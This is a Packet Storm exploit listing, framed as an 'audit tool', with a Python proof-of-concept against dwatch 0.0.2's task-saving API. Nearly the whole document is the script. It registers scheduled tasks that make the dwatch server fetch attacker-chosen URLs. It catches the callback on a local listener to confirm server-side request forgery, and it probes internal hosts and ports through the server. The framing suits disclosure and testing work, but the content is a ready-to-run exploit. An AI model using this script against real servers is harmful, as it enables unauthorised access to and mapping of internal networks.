PACKETSTORM

📄 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool_PACKETSTORM:222328

Description

This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2...
Visit Original Source

Basic Information

ID PACKETSTORM:222328
Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/dhjz/dwatch/ |
==================================================================================================================================

[+] Summary : a security utility to test network boundary enforcement and detect potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.

[+] POC :

#!/usr/bin/env python3


import re
import csv
import json
import time
import socket
import logging
import threading
import argparse
import urllib3
from pathlib import Path
from datetime import datetime
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, urljoin
import requests

logging.basicConfig(level=logging.INFO, format='%(asctime)s - [%(levelname)s] - %(message)s')
logger = logging.getLogger("DWatchAuditor")

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class DWatchAuditorCore:
"""Main engine: Responsible for managing the connection to the dwatch server and checking network restrictions."""

def __init__(self, target: str, callback_host: Optional[str] = None,
callback_port: int = 8888, verbose: bool = False):

parsed = urlparse(target if "://" in target else f"http://{target}")
if not parsed.netloc:
raise ValueError(f"Invalid target URL structure: {target}")

path = parsed.path if parsed.path else ""
self.base_url = f"{parsed.scheme}://{parsed.netloc}{path}".rstrip("/")

self.callback_host = callback_host
self.callback_port = callback_port
self.verbose = verbose

self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
'Content-Type': 'application/json'
})

self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
self.created_tasks: List[Dict] = []

self.callback_event = threading.Event()
self.callback_data: List[Dict] = []
self.lock = threading.Lock()

def _get_local_ip(self) -> str:
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception:
return "127.0.0.1"

def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
payload = {"name": name, "url": payload_url, "spec": spec}

try:
if self.verbose:
logger.info(f"Submitting audit payload: {name} -> {payload_url}")

response = self.session.post(self.save_endpoint, json=payload, timeout=10)

if response.status_code == 200 and response.text:
logger.info(f"Audit task '{name}' registered successfully.")
self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
return True

logger.error(f"Failed to create task. HTTP Status: {response.status_code}")
return False

except requests.RequestException as e:
logger.error(f"Network transport error during task creation: {e}")
return False

def verify_boundary_leak(self) -> bool:
if not self.callback_host:
self.callback_host = self._get_local_ip()

timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"

logger.info(f"Callback URL: {callback_url}")
self.callback_event.clear()

server_thread = threading.Thread(target=self._run_callback_socket)
server_thread.daemon = True
server_thread.start()

time.sleep(0.5)

task_name = f"Boundary_Audit_{timestamp}"

if self.create_audit_task(task_name, callback_url, spec="* * * * * *"):
logger.info("Waiting for inbound connection (timeout 12s)...")

triggered = self.callback_event.wait(timeout=12)

if triggered:
logger.critical("SSRF outbound boundary breach confirmed!")
self.callback_event.set()
server_thread.join(timeout=1)
return True
else:
logger.warning("No inbound request captured.")
self.callback_event.set()
server_thread.join(timeout=1)
return False

return False

def _run_callback_socket(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

try:
server_socket.bind(("0.0.0.0", self.callback_port))
server_socket.listen(1)
server_socket.settimeout(12)

while not self.callback_event.is_set():
try:
client, addr = server_socket.accept()
self.callback_event.set()

raw_request = client.recv(2048).decode("utf-8", errors="ignore")

with self.lock:
self.callback_data.append({"sender": addr, "raw": raw_request})

logger.info(f"Inbound connection from {addr[0]}:{addr[1]}")

try:
client.sendall(
b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
)
finally:
client.close()

except socket.timeout:
continue

except Exception as e:
logger.error(f"Callback listener error: {e}")

finally:
server_socket.close()

def check_internal_service(self, host: str, port: int) -> Dict:
url = f"http://{host}:{port}/"
task_name = f"service_recon_{port}_{int(time.time())}"

success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")

return {
"port": port,
"task_accepted": success,
"inference": (
"Task submitted - requires log verification"
if success else "Blocked or unreachable endpoint"
)
}


class InteractiveConsoleInterface:
"""User interface"""

def __init__(self, auditor: DWatchAuditorCore):
self.auditor = auditor

def display_menu(self):
while True:
print("\n" + "=" * 50)
print("dwatch SSRF Boundary Auditor")
print("=" * 50)
print("1. Run SSRF Test")
print("2. Check Internal Port")
print("3. Create Task")
print("4. View Tasks")
print("5. Exit")

choice = input("> ").strip()

if choice == "1":
self.auditor.verify_boundary_leak()

elif choice == "2":
host = input("Host: ").strip() or "127.0.0.1"
try:
port = int(input("Port: ").strip())
except ValueError:
print("Invalid port")
continue

print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))

elif choice == "3":
name = input("Task name: ").strip()
url = input("URL: ").strip()
self.auditor.create_audit_task(name, url)

elif choice == "4":
print(json.dumps(self.auditor.created_tasks, indent=2))

elif choice == "5":
break


def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", required=True)
parser.add_argument("-c", "--callback")
parser.add_argument("-i", "--interactive", action="store_true")
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()

callback_host = None
callback_port = 8888

if args.callback:
parts = args.callback.rsplit(":", 1)
callback_host = parts[0]
if len(parts) == 2:
callback_port = int(parts[1])

try:
auditor = DWatchAuditorCore(
target=args.target,
callback_host=callback_host,
callback_port=callback_port,
verbose=args.verbose
)

if args.interactive:
InteractiveConsoleInterface(auditor).display_menu()
else:
logger.info("Running SSRF boundary check...")
auditor.verify_boundary_leak()

except Exception as e:
logger.critical(f"Fatal error: {e}")


if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.